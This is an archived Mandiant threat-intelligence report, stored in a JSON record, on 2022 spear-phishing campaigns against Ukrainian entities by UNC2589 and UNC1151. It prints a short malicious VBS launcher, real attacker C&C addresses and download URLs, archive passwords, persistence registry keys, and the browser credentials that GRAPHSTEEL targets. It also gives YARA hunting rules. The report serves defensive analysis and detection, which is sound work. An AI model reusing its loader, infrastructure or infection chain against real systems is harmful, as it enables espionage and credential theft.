{
	"id": "62988be2-cb50-4b05-b54e-185b0df8df41",
	"created_at": "2026-04-06T00:18:49.069778Z",
	"updated_at": "2026-04-10T13:11:36.322988Z",
	"deleted_at": null,
	"sha1_hash": "91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8",
	"title": "Evacuation and Humanitarian Documents used to Spear Phish Ukrainian Entities | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 543855,
	"plain_text": "Evacuation and Humanitarian Documents used to Spear Phish\r\nUkrainian Entities | Mandiant\r\nBy Mandiant\r\nPublished: 2022-07-20 · Archived: 2026-04-05 18:17:22 UTC\r\nWritten by: Mandiant Threat Intelligence\r\nForeword\r\nMandiant is publishing the following blog to provide insight and context on a sampling of malicious activity\r\ntargeting Ukrainian entities during the ongoing war. We are highlighting UNC1151 and suspected UNC2589\r\noperations leveraging phishing with malicious documents leading to malware infection chains. Indicators used in\r\nthese operations have been released by U.S. CYBERCOMMAND.\r\nUA CERT has also published on several of these operations. Links to UA CERT reports can be found throughout\r\nthis blog.\r\nThreat Detail\r\nSince the start of the Russian invasion, public and private Ukrainian entities have been targeted by multiple cyber\r\nespionage groups. This blog goes into detail regarding two operations from UNC2589 and an operation from\r\nclusters likely related to UNC1151. While these groups have distinct sponsors and goals, the operations detailed\r\nhere are united by their use of lure documents about public safety to entice victims to open the spear phishing\r\nattachment.\r\nSpear phishes with themes that are urgent or timely can make a recipient more likely to open them and documents\r\nrelated to public safety and humanitarian emergencies are of particularly high interest to the residents of Ukraine\r\nfollowing the Russian invasion. These operations were designed to gain access to networks of interest, but we do\r\nnot have insight into the planned follow-on activities. 
The malware used in these intrusion attempts would enable a\r\nwide variety of operations, and these groups have previously conducted espionage, information operations and\r\ndisruptive attacks.\r\nThe intrusion attempts detailed below share a tactic; however, they are the work of two separate cyber espionage\r\ngroups.\r\nUNC1151 is a group that Mandiant assesses is sponsored by Belarus and has frequently used the access\r\nand information gained by their intrusions to support information operations tracked as “Ghostwriter.”\r\nMandiant released a blog last year detailing our assessments on UNC1151, and they have continued to be\r\nvery active in targeting Ukraine since the start of the Russian invasion, paralleling the Belarusian government’s\r\nenablement of Russia’s invasion.\r\nhttps://www.mandiant.com/resources/spear-phish-ukrainian-entities\r\nPage 1 of 14\n\nUNC2589 is believed to act in support of Russian government interests and has been conducting extensive\r\nespionage collection in Ukraine. Notably, we assess UNC2589 is behind the January 14th disruptive attacks\r\non Ukrainian entities with PAYWIPE (WHISPERGATE). Following the disruptive attack, UNC2589 has\r\nprimarily targeted Ukraine, but has also been active against NATO member states in North America and\r\nEurope.\r\nThe activity discussed below is only a small subset of the extensive cyber operations that have targeted Ukraine\r\nwith disruptive and espionage-motivated operations.\r\nLikely UNC2589 Operations\r\nActor Overview\r\nUNC2589 is a cluster of cyber espionage activity Mandiant has tracked since early 2021 and may have been active\r\nas early as late 2020. Though UNC2589 has primarily targeted entities in Ukraine and Eastern Europe, it has also\r\nactively targeted government and defense entities throughout Europe and North America. 
We believe UNC2589 acts\r\nin support of Russian government goals, but we have not uncovered evidence to link it conclusively.\r\nUNC2589 uses spear phishing campaigns, which may be disguised as forwarded emails from both actor-controlled\r\nand compromised legitimate accounts. Lure themes leveraged by UNC2589 include COVID-19, the war in Ukraine,\r\ngovernment-related themes, regional themes, or even generic themes such as Bitcoin. Payloads for the phishing\r\noperations include malicious macro documents, CPL downloaders, ZIP files, or other archives. UNC2589 has also\r\nused a variety of different infrastructure, including actor-controlled domains, IP addresses located mostly in Russia,\r\nand Discord channels.\r\nThough we track UNC2589 as a cluster of cyber espionage activity, we have attributed the January 14 destructive\r\nattack on Ukraine using PAYWIPE (WHISPERGATE) to UNC2589. We believe UNC2589 may be capable of\r\nengaging in disruptive or destructive cyber operations in the future.\r\nMalware Overview\r\nGRIMPLANT is a backdoor written in Go which reaches out using Google RPC to a Base64-encoded and\r\nAESCTS-encrypted C\u0026C read from a command-line argument. GRIMPLANT conducts a system survey which it\r\nuploads to the C\u0026C and can execute commands provided by the C\u0026C on the victim’s device.\r\nGRAPHSTEEL is an infostealer which appears to be a modified, weaponized version of the public GitHub project\r\ngoLazagne. GRAPHSTEEL gathers a survey of the victim machine including browser credentials, enumerates\r\ndrives D-Z, and uploads files to the C\u0026C.\r\nLikely UNC2589 Campaign Leverages Evacuation-Themed Lure\r\nInfection Vector\r\nMandiant analyzed a malicious document with an evacuation plan-themed lure, likely used by UNC2589 to target\r\nUkrainian entities in a phishing campaign in late February 2022. 
This sample is a packed SFX RAR that runs and\r\ninstalls an Arabic version of the RemoteUtils utility. Upon execution, the Remote Utilities utility reaches out to a\r\nC\u0026C used in an earlier UNC2589 operation also targeting Ukraine.\r\nFigure 1: SBU alert on fake evacuation emails (Source)\r\nThe infection vector is currently uncertain, but we suspect the malicious files may have been delivered via phishing\r\nemail. It is important to note that Remote Utilities comes in a UPX-packed SFX RAR from the vendor, and it does\r\nnot appear the attackers changed the default. However, the attackers appear to have used several layers of password-protected archives before dropping and executing the default UPX-packed SFX extractor with an SFX RAR. The lure\r\ndocuments all reference an “evacuation plan” allegedly originating from the Ukrainian SBU.\r\nплан евакуації (затверджений сбу 28.02.2022 наказом № 009363677833).rar_pass_123.zip (MD5:\r\ncd8834da2cfb0285fa75decf6c67d049)\r\nPassword-protected ZIP file\r\nPassword: 123\r\nПлан евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).rar (MD5:\r\n3cd599654aff2e432ae3390d33c64f5e)\r\nRAR containing RAR SFX and text file with RAR passwords\r\nкод доступу.txt (MD5: 144ccb808e2d2e1f0119ea2a8f7490bc)\r\nText file with RAR password\r\nPassword: 2267903645\r\n2b0338c9f3f46955cfd2dc97c02bd554 (application/x-rar) план евакуації (затверджений сбу 28.02.2022\r\nнаказом № 009363677833).part1.rar\r\nPassword-protected SFX RAR\r\nPassword: 2267903645\r\nContains: План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe (MD5:\r\nea47d88d73fecb1fad1e737f1b373d7f)\r\n97e16c0b770dbbe4fa94cebac92082b7 (application/x-rar) план евакуації (затверджений сбу 28.02.2022\r\nнаказом № 009363677833).part2.rar\r\nPassword-protected SFX RAR\r\nPassword: 
2267903645\r\nContains: План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe (MD5:\r\nea47d88d73fecb1fad1e737f1b373d7f)\r\nПлан евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe (MD5:\r\nea47d88d73fecb1fad1e737f1b373d7f)\r\nTranslation: Evacuation Plan (approved by SBU 28.02.2022 in order № 009363677833).exe\r\nUPX-packed SFX extractor; likely default for Remote Utilities\r\nUnpacked: MD5: a236cb7f2b0e34619039788de7f7760b\r\nC:\\Program Files (x86)\\Remote Utilities – Host\\ rutserv.exe (MD5: 2bb5d5aa07fa2c8e9874c117c8fa51d6)\r\nRemoteUtils utility\r\nExecution\r\nUpon execution of the packed SFX RAR, it installs the Remote Utilities executable. The Remote Utilities\r\nexecutable reaches out to preconfigured C\u0026Cs iteratively over TCP:\r\n111.90.151.182:5651\r\n111.90.151.182:8080\r\n111.90.151.182:5555\r\n111.90.151.182:4899\r\nRemote Utilities is not malicious by itself but can be used maliciously by threat actors. The utility can enable a\r\nthreat actor to:\r\nDownload and upload files to a C\u0026C\r\nRemotely execute files\r\nSet persistence through a startup service\r\nPersistence Method\r\nRemote Utilities allows attackers to set persistence by creating a startup service.\r\nLikely UNC2589 Uses Wage and Anti-Virus Themed Lures\r\nInfection Vector\r\nMandiant Intelligence discovered a likely UNC2589-related phishing campaign targeting Ukrainian entities with\r\nGRIMPLANT and GRAPHSTEEL malware on March 27, 2022. The Ukrainian CERT previously reported on\r\nUAC-0056, a cluster that aligns with what we track as UNC2589, using GRIMPLANT, GRAPHSTEEL, and\r\nBEACON malware against Ukrainian entities.\r\nThe malware was delivered via phishing email. 
The attacker used a compromised legitimate account from a related\r\norganization to send the phishing emails on March 27.\r\nThe phishing email contained an attached XLS document with macros.\r\nЗаборгованість по зарплаті.xls (MD5: da305627acf63792acb02afaf83d94d1)\r\nMachine translation from Ukrainian: Wage arrears\r\nTimestamp: 2022-03-21 09:37:30\r\nContains legitimate macros from ExcelVBA.ru, a company which creates benign Macros for Excel\r\nfor legitimate use\r\nThe macros in the document were designed by ExcelVBA.ru, a company that designs macros for business use.\r\nHowever, in this case the macro was used to drop a malicious payload onto the victim machine. The company’s\r\nwebsite makes the macros freely available, so we have no indication that they are tied to this activity or even aware\r\nof it.\r\nBase-Update.exe (MD5: 06124da5b4d6ef31dbfd7a6094fc52a6)\r\nDownloader written in Go\r\nCompile time: 1970-01-01 00:00:00\r\nC\u0026C: 194.31.98.124:443\r\nNote: The Go binary Base-Update.exe does not have symbols stripped. Symbols from the main Go module in this\r\nproject are called “elephant.”\r\nUnlike the downloaders previously documented by UA CERT, Mandiant Threat Intelligence believes that these\r\ndownloaders were likely altered by the threat actor to avoid detection. 
One of the new techniques utilized by the\r\nthreat actor was runtime decryption of certain strings.\r\nFigure 2: New downloader identified by Mandiant Threat Intelligence decrypting strings with custom key and XOR\r\nalgorithm\r\nFigure 3: Original downloader generating the path for java-sdk.exe\r\nExecution\r\nUpon execution of Base-Update.exe, it proceeds to download, Base64-decode, and execute another timestomped\r\ndownloader written in Go from http://194.31.98.124:443/i with the arguments -a 0CyCcrhI/6B5wKE8XLOd+w==:\r\n%TEMP%\\java-sdk.exe (MD5: 36ff9ec87c458d6d76b2afbd5120dfae)\r\nDownloader written in Go\r\nBase64-encoded - MD5: 2f14b3d5ab01568e2707925783f8eafe\r\nCompile time: 1970-01-01 00:00:00\r\nC\u0026C: 194.31.98.124:443\r\njava-sdk.exe sets persistence for itself by setting a Run registry key. It then proceeds to download, decode, and\r\nexecute two additional Base64-encoded files, GRIMPLANT and GRAPHSTEEL.\r\noracle-java.exe (MD5: 4a5de4784a6005aa8a19fb0889f1947a)\r\nGRIMPLANT backdoor\r\nBase64-encoded – MD5: 2a843511cdb8f5604cb3fafe244ef5f2\r\nCompile time: 1970-01-01 00:00:00\r\nC\u0026C: http://194.31.98.124:80\r\nmicrosoft-cortana.exe (MD5: 6b413beb61e46241481f556bb5cdb69c)\r\nGRAPHSTEEL infostealer\r\nBase64-encoded – MD5: a0c4ddf9c6f95d7046be8a2e0f875935\r\nCompile time: 2022-03-20 14:24:42\r\nC\u0026C: ws://194.31.98.124:443/c\r\nGRIMPLANT Execution\r\nUpon execution of GRIMPLANT, it reads its configured C\u0026C from the command line. 
The configured C\u0026C is\r\nBase64-encoded and AESCTS-encrypted and results in GRIMPLANT communicating with 194.31.98.124.\r\nGRIMPLANT conducts a basic system survey, querying the following:\r\nComputer name\r\nUsername\r\nHome directory\r\nIP address (via the ipify API)\r\nHostname\r\nOS\r\nNumber of CPUs\r\nGRIMPLANT then uploads the system survey to the C\u0026C. Note that GRIMPLANT communicates with the C\u0026C\r\nover Google RPC using TLS. GRIMPLANT handles PowerShell commands it receives from the C\u0026C, sending the\r\nresult of the command back to the C\u0026C. Unlike GRAPHSTEEL, GRIMPLANT does not use an added layer of\r\nencryption to its C\u0026C communications.\r\nGRAPHSTEEL Execution\r\nUpon execution of GRAPHSTEEL, it conducts a system survey of the host and user information and reaches out to\r\nthe ipify API to determine the IP address. It then AESCTS-encrypts and uploads the surveyed victim information to\r\nthe C\u0026C. When it gets a response from the C\u0026C, GRAPHSTEEL proceeds to harvest browser credentials,\r\nincluding:\r\nChrome\r\nInternet Explorer\r\nFirefox\r\nThunderbird\r\nGRAPHSTEEL also attempts to collect mail data from Mozilla Thunderbird, extract data from FileZilla, find\r\nunprotected SSH keys on the target machine, query PuTTY to access the public key, and read any MobaXterm config.\r\nAfter collecting this information, it encrypts and uploads the information to the C\u0026C. GRAPHSTEEL then\r\nenumerates drives D-Z and the files within each drive. 
GRAPHSTEEL reads the content of each unique file and\r\nuploads those to the C\u0026C.\r\nNote: the GRAPHSTEEL project also does not have symbols stripped and the main Go package is called\r\n“elephant.”\r\nPersistence Method\r\nThe malware maintains its persistence on the victim’s system by setting the following Run registry key:\r\nKey: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\java-sdk\r\nValue: %TEMP%\\java-sdk.exe -a\r\nRelated Samples\r\nThis activity is related to activity previously reported on by UA CERT on a campaign leveraging GRIMPLANT and\r\nGRAPHSTEEL malware. Notably, the two campaigns share malware overlaps and filename overlaps, but lack\r\ninfrastructure overlaps. In addition, unlike other UNC2589 campaigns including the one reported on by UA CERT,\r\nthis new operation does not use Discord to host malware.\r\nInstruction on anti-virus protection.doc (MD5: ca9290709843584aecbd6564fb978bd6)\r\nLure document\r\nC\u0026C: https://forkscenter.fr/BitdefenderWindowsUpdatePackage.exe\r\nUser guide.doc (MD5: cf204319f7397a6a31ecf76c9531a549)\r\nLure document\r\nC\u0026C: https://forkscenter.fr/BitdefenderWindowsUpdatePackage.exe\r\nbitdefenderwindowsupdatepackage.exe (MD5: b8b7a10dcc0dad157191620b5d4e5312)\r\nDropper for alt.exe\r\nDownloaded from https://forkscenter.fr/BitdefenderWindowsUpdatePackage.exe\r\nalt.exe (MD5: 2fdf9f3a25e039a41e743e19550d4040)\r\nThemida packed downloader\r\nC\u0026Cs:\r\nhttps://cdn.discordapp.com/attachments/947916997713358890/949948174636830761/one.exe\r\nhttps://cdn.discordapp.com/attachments/947916997713358890/949948174838165524/dropper.exe\r\none.exe (MD5: aa5e8268e741346c76ebfd1f27941a14)\r\nDownloader and BEACON loader\r\nDownloads wisw.exe from https://forkscenter.fr/Sdghrt_umrj6/wisw.exe\r\nBEACON Shellcode MD5: 
e56555162c559a55021b879147b0791f\r\nC\u0026Cs:\r\nhttps://nirsoft.me/nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb/avp/amznussraps/\r\nhttps://nirsoft.me/s/2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl/field-keywords/\r\nwisw.exe (MD5: 9ad4a2dfd4cb49ef55f2acd320659b83)\r\nThemida-packed downloader\r\nDownloaded from https://forkscenter.fr/Sdghrt_umrj6/wisw.exe\r\nC\u0026C:\r\nhttps://cdn.discordapp.com/attachments/947916997713358890/949978571680673802/cesdf.exe\r\ndropper.exe (MD5: 15c525b74b7251cfa1f7c471975f3f95)\r\nGo downloader\r\nC\u0026C: https://45.84.0.116/i\r\njava-sdk.exe (MD5: c8bf238641621212901517570e96fae7)\r\nGo downloader\r\nDownloaded as Base64-encoded text from https://45.84.0.116/i\r\nC\u0026Cs:\r\nhttp://45.84.0.116:443/m\r\nhttp://45.84.0.116:443/p\r\noracle-java.exe (MD5: 4f11abdb96be36e3806bada5b8b2b8f8)\r\nGRIMPLANT malware\r\nDownloaded as Base64-encoded text from http://45.84.0.116:443/m\r\nmicrosoft-cortana.exe (MD5: 9ea3aaaeb15a074cd617ee1dfdda2c26)\r\nGRAPHSTEEL malware\r\nDownloaded as Base64-encoded text from http://45.84.0.116:443/p\r\nUNC1151 Operations\r\nActor Overview\r\nUNC1151 is a cluster of cyber espionage activity which has links to the Belarusian government. (Please see our\r\npreviously published blog on UNC1151 for additional details.) UNC1151 also provides technical support to the\r\nGhostwriter information operations campaign. Though we cannot rule out Russian contributions to either UNC1151\r\nor Ghostwriter activities, we have not yet identified evidence of any collaboration between Russian APTs and\r\nUNC1151.\r\nUNC1151 primarily targets government and media entities focusing on Ukraine, Lithuania, Latvia, Poland, and\r\nGermany. UNC1151 has been active in targeting primarily Ukraine and Poland since the Russian invasion of\r\nUkraine in February.\r\nMalware Overview\r\nBEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. 
Supported backdoor\r\ncommands include shell command execution, file transfer, file execution, and file management. BEACON can also\r\ncapture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting\r\nsystem credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C\u0026C\r\nserver via HTTP or DNS.\r\nMICROBACKDOOR is a client backdoor and server-side tool which has been available on GitHub since May\r\n2021. MICROBACKDOOR was developed by ‘Cr4sh’ (aka Dmytro Oleksiuk), who has also developed other\r\nnotable malware used by Russian APTs including BlackEnergy. MICROBACKDOOR can upload and download\r\nfiles, execute commands, update itself, and take screenshots. It also supports HTTP, SOCKS4 and SOCKS5 proxies to\r\nroute traffic.\r\nNote: the version of MICROBACKDOOR used by UNC1151 in this report has been modified by the actor to\r\ninclude screenshot functionality. Screenshot functionality is not present in the version of MICROBACKDOOR\r\navailable on GitHub.\r\nUNC1151 Uses Sheltering-Themed Lures\r\nInfection Vector\r\nIn early March 2022, Mandiant Threat Intelligence discovered new activity targeting Ukrainian entities using\r\nMICROBACKDOOR and a lure titled “що робити? пiд час артилерiйских обстрiлiв системами залповова\r\nвогню” (Translation: “What to do? During artillery shelling by volley fire systems”). 
MICROBACKDOOR is a\r\nclient backdoor and server-side (command and control) tool which has been available on GitHub since May 2021\r\nand was developed by ‘Cr4sh’ (aka Dmytro Oleksiuk).\r\nTo deliver the payload, the actor used a ZIP containing a CHM file.\r\nдовідка.zip (MD5: e34d6387d3ab063b0d926ac1fca8c4c4)\r\nTranslation: Certificate.zip\r\ndovidka.chm (MD5: 2556a9e1d5e9874171f51620e5c5e09a)\r\nContains obfuscated VBS\r\nExecution\r\nIf desktop.ini does not exist at the path C:\\Users\\Public\\Favorites\\desktop.ini (indicating that the backdoor is not\r\nyet installed), the VBS code within dovidka.chm drops the decoded next payload to C:\\Users\\Public\\ignit.vbs. The\r\ncode then creates the folder C:\\Users\\Public\\Favorites and executes C:\\Users\\Public\\ignit.vbs.\r\nC:\\Users\\Public\\ignit.vbs (MD5: bd65d0d59f6127b28f0af8a7f2619588)\r\nMalicious VBS launcher\r\nThe VBS file ignit.vbs mentioned in Figure 4 drops three files:\r\n%STARTUP%\\Windows Prefetch.lNk (MD5: 8fc42ee971ab296f921bb05633f6b4a6)\r\nLNK used to achieve persistence for the payload via the Startup folder\r\nNote: the unusual capitalization is hardcoded\r\nC:\\Users\\Public\\Favorites\\desktop.ini (MD5: a9dcaf1c709f96bc125c8d1262bac4b6)\r\nHelper file to launch the payload, core.dll\r\nC:\\Users\\Public\\Libraries\\core.dll (MD5: d2a795af12e937eb8a89d470a96f15a5)\r\nFollow-on payload\r\nCompile Timestamp: 2022-01-31T15:00:46.000+0000\r\nLoads in memory:\r\n047fbbb380cbf9cd263c482b70ddb26f\r\nEither via the LNK after startup, or directly via the VBS, the command line “wscript.exe //B //E:vbs\r\nC:\\Users\\Public\\Favorites\\desktop.ini” is executed, referencing the helper file dropped by the sample mentioned\r\nabove. 
Finally, the file C:\\Users\\Public\\ignit.vbs is deleted after execution.\r\n“desktop.ini” is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a\r\nhidden window without returning any error codes.\r\nThe entire contents of this file are:\r\nSet fso = CreateObject(\"Scripting.FileSystemObject\")\r\nexecPath = \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U \" \u0026 \"C:\\Users\\Public\\Libraries\\core.dll\"\r\nSet shell = CreateObject(\"Wscript.Shell\")\r\nshell.run(execPath), 0, false\r\nThe file C:\\Users\\Public\\Libraries\\core.dll is a malicious .NET file packed with an unknown obfuscator which may\r\nbe related to Confuser. This sample drops an additional malicious payload into memory and executes it.\r\nclient.dll (MD5: 047fbbb380cbf9cd263c482b70ddb26f)\r\nDescription: MICROBACKDOOR backdoor\r\nC\u0026C: xbeta.online:8443\r\nThe payload (MD5: 047fbbb380cbf9cd263c482b70ddb26f) is a sample of MICROBACKDOOR. This backdoor\r\nmalware has capabilities such as manipulating files (list/get/put), executing commands, updating itself\r\nautomatically, and taking screenshots. This family also supports HTTP, SOCKS4 and SOCKS5 proxies to route traffic.\r\nMICROBACKDOOR is an open-source project written by cr4sh, aka Dmytro Oleksiuk. As with other\r\nMICROBACKDOOR samples previously used by UNC1151, this sample appears to have had the screenshot\r\nfunctionality added.\r\nOnce run, the MICROBACKDOOR payload would reach out to ‘xbeta.online:8443’. 
It would transmit a packet of\r\ndata every 10 seconds.\r\nAppendix\r\nMITRE ATT\u0026CK Framework\r\nUNC2589\r\nT1003: OS Credential Dumping\r\nT1027: Obfuscated Files or Information\r\nT1027.002: Software Packing\r\nT1055: Process Injection\r\nT1059: Command and Scripting Interpreter\r\nT1059.005: Visual Basic\r\nT1070.006: Timestomp\r\nT1071.001: Web Protocols\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1114.001: Local Email Collection\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1497.001: System Checks\r\nT1547.001: Registry Run Keys / Startup Folder\r\nT1552.001: Credentials In Files\r\nT1555.003: Credentials from Web Browsers\r\nT1560: Archive Collected Data\r\nT1560.001: Archive via Utility\r\nT1566.001: Spearphishing Attachment\r\nT1573.001: Symmetric Cryptography\r\nT1573.002: Asymmetric Cryptography\r\nT1622: Debugger Evasion\r\nUNC1151\r\nT1012: Query Registry\r\nT1016: System Network Configuration Discovery\r\nT1027: Obfuscated Files or Information\r\nT1033: System Owner/User Discovery\r\nT1055: Process Injection\r\nT1059: Command and Scripting Interpreter\r\nT1070.006: Timestomp\r\nT1071.001: Web Protocols\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1087: Account Discovery\r\nT1095: Non-Application Layer Protocol\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1547.009: Shortcut Modification\r\nT1573.002: Asymmetric Cryptography\r\nT1620: Reflective Code Loading\r\nT1622: Debugger Evasion\r\nDetection Rules\r\nrule MTI_HUNTING_Crypto_GRIMPLANT_GRAPHSTEEL\r\n{\r\nmeta:\r\nauthor = \"Mandiant Threat Intelligence\"\r\ndescr = \"Find the crypto key for GRIMPLANT/GRAPHSTEEL C2 decryption\"\r\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\nstrings:\r\n$ = {f1 d2 19 60 d8 eb 2f dd f2 53 8d 29 a5 fd 50 b5}\r\n$ = {f6 4a 3f 9b f0 
6f 2a 3c 4c 95 04 38 c9 a7 f7 8e}\r\n$ = \" ciphertext is not large enough. It is less that one block size. Blocksize:%v; Ciphertext:%v\"\r\ncondition:\r\nall of them\r\n}\r\nrule MTI_Hunt_APT_Modified_MICROBACKDOOR_Strings\r\n{\r\nmeta:\r\ndescription = \"Detects strings found in modified MICROBACKDOOR samples with screenshot capability\"\r\ndisclaimer = \"This rule is meant for hunting and is not tested to run in a production environment\"\r\nstrings:\r\n$a = \"ERROR: Unknown command\"\r\n$b = \"ProxyServer\"\r\n$c = \"screenshot\"\r\n$d = \"uninst\"\r\n$e = \"shell\"\r\n$f = \"client.dll\"\r\n$g = \"Timeout occured\"\r\ncondition:\r\nall of them\r\n}\r\nSource: https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.mandiant.com/resources/spear-phish-ukrainian-entities"
	],
	"report_names": [
		"spear-phish-ukrainian-entities"
	],
	"threat_actors": [
		{
			"id": "f29188d8-2750-4099-9199-09a516c58314",
			"created_at": "2025-08-07T02:03:25.068489Z",
			"updated_at": "2026-04-10T02:00:03.827361Z",
			"deleted_at": null,
			"main_name": "MOONSCAPE",
			"aliases": [
				"TA445 ",
				"UAC-0051 ",
				"UNC1151 "
			],
			"source_name": "Secureworks:MOONSCAPE",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "119c8bea-816e-4799-942b-ff375026671e",
			"created_at": "2022-10-25T16:07:23.957309Z",
			"updated_at": "2026-04-10T02:00:04.807212Z",
			"deleted_at": null,
			"main_name": "Operation Ghostwriter",
			"aliases": [
				"DEV-0257",
				"Operation Asylum Ambuscade",
				"PUSHCHA",
				"Storm-0257",
				"TA445",
				"UAC-0051",
				"UAC-0057",
				"UNC1151",
				"White Lynx"
			],
			"source_name": "ETDA:Operation Ghostwriter",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"HALFSHELL",
				"Impacket",
				"RADIOSTAR",
				"VIDEOKILLER",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c28760b2-5ec6-42ad-852f-be00372a7ce4",
			"created_at": "2022-10-27T08:27:13.172734Z",
			"updated_at": "2026-04-10T02:00:05.279557Z",
			"deleted_at": null,
			"main_name": "Ember Bear",
			"aliases": [
				"Ember Bear",
				"UNC2589",
				"Bleeding Bear",
				"DEV-0586",
				"Cadet Blizzard",
				"Frozenvista",
				"UAC-0056"
			],
			"source_name": "MITRE:Ember Bear",
			"tools": [
				"P.A.S. Webshell",
				"CrackMapExec",
				"ngrok",
				"reGeorg",
				"WhisperGate",
				"Saint Bot",
				"PsExec",
				"Rclone",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73",
			"created_at": "2023-01-06T13:46:39.195689Z",
			"updated_at": "2026-04-10T02:00:03.243054Z",
			"deleted_at": null,
			"main_name": "Ghostwriter",
			"aliases": [
				"UAC-0057",
				"UNC1151",
				"TA445",
				"PUSHCHA",
				"Storm-0257",
				"DEV-0257"
			],
			"source_name": "MISPGALAXY:Ghostwriter",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434729,
	"ts_updated_at": 1775826696,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8.pdf",
		"text": "https://archive.orkl.eu/91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8.txt",
		"img": "https://archive.orkl.eu/91acb4a1d7712dcdd3c3a17f7cc234f5109cf4c8.jpg"
	}
}